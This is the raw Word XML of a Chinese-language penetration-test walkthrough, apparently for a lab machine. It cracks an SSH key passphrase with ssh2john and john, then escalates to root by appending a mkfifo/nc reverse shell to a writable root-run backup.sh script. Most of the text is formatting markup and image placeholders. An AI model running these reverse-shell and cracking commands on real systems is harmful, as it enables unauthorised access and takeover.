          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>生成密码文件然后爆破，保存秘钥到本地：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE217E7" w14:textId="696659BD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44E47418" wp14:editId="0E5EE43B">
            <wp:extent cx="5274310" cy="5741035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1403178140" name="图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C242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用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ssh2john.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>脚本编译一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118409F" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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/usr/share/john/ssh2john.py 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id_rsa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 &gt; crack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73DF83" w14:textId="5B26163C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0B469450" wp14:editId="1993EE35">
            <wp:extent cx="5274310" cy="1547495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2143922729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96ED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爆破：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D750958" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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john --wordlist=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usr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/share/wordlists/rockyou.txt crack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF44991" w14:textId="30E7A804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2DB48181" wp14:editId="54E3595A">
            <wp:extent cx="5274310" cy="1494790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1305978550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F5ED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解得密码为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>vodka06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69054C0D" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="525" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t>收集用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t>thales</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t>的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B438F74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在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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>连接的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tomcat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>中切换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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>thales</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>用户：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E30ADD" w14:textId="72D0D4E9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00D8ED6F" wp14:editId="152CCD68">
            <wp:extent cx="3771900" cy="892810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="2103561090" name="图片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A331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切换成功，查看一下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/home </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>目录下的信息：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56955FA6" w14:textId="7F7F0445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1D197E50" wp14:editId="1B574F04">
            <wp:extent cx="5274310" cy="790575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="76860784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3CC5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 xml:space="preserve">user.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>文件中有字符串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>解码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF26C3" w14:textId="1CD0576D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760F855F" wp14:editId="0D3747F6">
            <wp:extent cx="5274310" cy="1680210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="617217684" name="图片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CE79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能解出，要收费，先看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notes.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>文件中的信息，刚才发现也没有利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883C450" w14:textId="770186BE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4C7C8FB3" wp14:editId="0EDAB294">
            <wp:extent cx="5274310" cy="3894455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2070806042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E810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可以看出是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>运行的，查看文件权限：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E96DBA" w14:textId="33B24D33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61A1A3C3" wp14:editId="5CBC0255">
            <wp:extent cx="4305300" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="354113657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5015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发现我们读写执行都可以。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C43BD3" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="525" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
        </w:rPr>
        <w:t>三、提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37F3C7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在其中添加反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>（一些反弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>可以参考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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>pentestmonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>网站上的）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90093D" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="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echo "rm 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tmp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f;mkfifo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tmp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f;cat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tmp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/f|/bin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sh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 -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 xml:space="preserve"> 2&gt;&amp;1|nc 192.168.11.129 1235 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="cs"/>
          <w:color w:val="15A7A7"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/f" &gt;&gt; backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF2ADF" w14:textId="19DB88E5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11145299" wp14:editId="69B68364">
            <wp:extent cx="5274310" cy="4077335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="941843956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9251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用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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1235 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>端口，等了一会就连上了：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5F716" w14:textId="28242F64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53B17A7E" wp14:editId="04D6310B">
            <wp:extent cx="5274310" cy="1150620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1185937181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A950" w14:textId="2C18D1DC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/>
          <w:noProof/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB5157B" wp14:editId="58D2DA98">
            <wp:extent cx="5274310" cy="2553335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="681523848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1CE1" w14:textId="77777777" w:rsidR="004138ED" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="20233E"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>获得了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
          <w:color w:val="B7BDFA"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC51D61" w14:textId="0400D422" w:rsidR="004138ED" w:rsidRPr="00E947EC" w:rsidRDefault="004138ED" w:rsidP="004138ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Varela Round" w:hAnsi="Varela Round" w:cs="Varela Round" w:hint="cs"/>
            <w:color w:val="0000FF"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="004138ED" w:rsidRPr="00E94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C595" w14:textId="77777777" w:rsidR="00C55698" w:rsidRDefault="00C55698" w:rsidP="00E947EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="267253AC" w14:textId="77777777" w:rsidR="00C55698" w:rsidRDefault="00C55698" w:rsidP="00E9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2AE1" w14:textId="77777777" w:rsidR="00C55698" w:rsidRDefault="00C55698" w:rsidP="00E947EC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="36DF8B7B" w14:textId="77777777" w:rsidR="00C55698" w:rsidRDefault="00C55698" w:rsidP="00E94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E1"/>
    <w:rsid w:val="000B2DE8"/>
    <w:rsid w:val="001B1154"/>
    <w:rsid w:val="00295E3E"/>
    <w:rsid w:val="002C66D4"/>
    <w:rsid w:val="004138ED"/>
    <w:rsid w:val="004545E1"/>
    <w:rsid w:val="006403F2"/>
    <w:rsid w:val="009B09E4"/>
    <w:rsid w:val="009B7E55"/>
    <w:rsid w:val="00A37B12"/>
    <w:rsid w:val="00AA170F"/>
    <w:rsid w:val="00C55698"/>
    <w:rsid w:val="00D17CF6"/>
    <w:rsid w:val="00E9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B3F54"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E796EA60-1794-446F-AC6F-92529412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38E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4138ED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C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7CF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95E3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947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947E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94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947E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38E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4138ED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38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138ED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413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5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hyperlink" Target="https://www.cnblogs.com/sainet/p/1564622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nblogs.com/sainet/p/15783539.html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25B8-D6A0-45A5-8EB0-68CE050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泽巍</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>吴 泽巍</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-19T07:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-19T08:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>